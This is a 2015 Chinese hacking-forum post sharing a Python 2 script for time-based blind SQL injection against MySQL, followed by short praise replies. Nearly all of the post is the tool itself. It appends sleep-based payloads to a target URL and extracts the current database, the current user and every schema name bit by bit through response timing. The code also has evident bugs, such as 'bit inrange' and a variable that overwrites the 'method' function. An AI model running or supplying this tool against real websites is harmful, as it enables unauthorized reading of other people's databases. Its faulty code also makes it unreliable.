基于时间延迟注入的mysql工具
本帖最后由 xiaoye 于 2015-9-30 10:55 编辑理论链接:
http://open.freebuf.com/inland/574.html
如有不懂,请参考上述链接
一个基本可用的,当前仅支持mysql,可以读取数据库名,当前用户,以及当前库,其他功能还在实现
#coding:utf8
#author:i3esn0w
import urllib2
import time
import threading
import urllib
from optparse import OptionParser
result={}
database={}
class data_therad(threading.Thread):
#----------------------------------------------------------------------
def __init__(self,url,length,sql):
""""""
threading.Thread.__init__(self)
self.length=length
self.url=url
self.sql=sql
#----------------------------------------------------------------------
def run(self):
""""""
data=""
global result
for bit in range(1,9):
try:
payload=' and if(mid(lpad(bin(ord(mid(('+self.sql+'),%s,1))),8,0),%s,1)=0,sleep(10),0)'%(str(self.length),str(bit))
target=self.url+urllib.quote(payload)
req=urllib2.urlopen(target,timeout=3)
html=req.read()
data+=str(1)
except Exception,e:
data+=str(0)
pass
result=chr(int(data,2))
class db_name(threading.Thread):
#----------------------------------------------------------------------
def __init__(self,url,length,db_num):
""""""
threading.Thread.__init__(self)
self.url=url
self.lenth=length
self.db_num=db_num
# print self.lenth
#----------------------------------------------------------------------
def run(self):
""""""
data=""
global database
for bit inrange(1,9):
try:
payload=' and if(mid(lpad(bin(ord(mid((SELECT SCHEMA_NAME FROM information_schema.schemata limit %s,1),%s,1))),8,0),%s,1)=0,sleep(10),0)'%(self.db_num,self.lenth,bit)
target=self.url+urllib.quote(payload)
req=urllib2.urlopen(target,timeout=3)
html=req.read()
data+=str(1)
except Exception,e:
data+=str(0)
pass
database=chr(int(data,2))
def getLenth(url,sql):
i=0
#print "[*]正在获取数据长度"
while True:
try:
payload=' and sleep(if(length(('+sql+'))=%s,10,0))'%str(i)
target=url+urllib.quote(payload)
req=urllib2.urlopen(target,timeout=3)
result=req.read()
i=i+1
except Exception,e:
#print "[*]数据长度:"+str(i)
return i
def get(url,length,method):
global result
tmp=""
print "[*]正在获取数据内容"
threads=[]
for len1 in range(1,length+1):
sb=data_therad(url,len1,method)
sb.setDaemon(True)
threads.append(sb)
for thread in threads:
thread.start()
thread.join()
for i in range(1,length+1):
tmp+=result
print "[*]数据内容为:"+tmp
def method(url,meth):
if meth=="current-db":
sql="select database()"
length=getLenth(url, sql)
get(url, length, sql)
if meth=="current-user":
sql="select user()"
length=getLenth(url, sql)
get(url, length, sql)
if meth=="dbs":
print "[*]正在获取数据库个数"
num=getdbs_num(url)
print "[*]数据库个数为:%s"%num
print "[*]正在获取所有数据库名"
for number in range(1,num+1):
sql="SELECT SCHEMA_NAME FROM information_schema.schemata limit %s,1"%number
length=getLenth(url, sql)
db=getdbname(url,length,number)
print "[*]"+db
def getdbname(url,length,number):
global database
tmp=""
#print "[*]正在获取第%s个数据库"%number
threads=[]
for len in range(1,length+1):
sb=db_name(url, len, number)
sb.setDaemon(True)
threads.append(sb)
for thread in threads:
thread.start()
thread.join()
for i in range(1,length+1):
tmp+=database
return tmp
def getdbs_num(url):
i=0
#print "[*]正在获取数据库个数"
while True:
try:
payload=' and sleep(if((SELECT count(*) FROM information_schema.schemata)=%s,10,0))'%str(i)
target=url+urllib.quote(payload)
req=urllib2.urlopen(target,timeout=3)
result=req.read()
i=i+1
except Exception,e:
#print "[*]数据库个数:"+str(i)
return i
if __name__=='__main__':
parser=OptionParser()
parser.add_option("-t","--target",dest="target_url",default="",help="The target url")
parser.add_option("-m","--method",dest="method",default="current-user")
(options,args)=parser.parse_args()
url=options.target_url
method=options.method
start_time=time.time()
method(url,method)
end_time=time.time()
print "[*]总共耗时:%s s"%int((end_time-start_time))
支持,看起来不错呢! 学习学习技术,加油! 学习学习技术,加油! 感谢楼主的分享~ 学习学习技术,加油! 支持中国红客联盟(ihonker.org) 感谢楼主的分享~ 还是不错的哦,顶了 支持,看起来不错呢!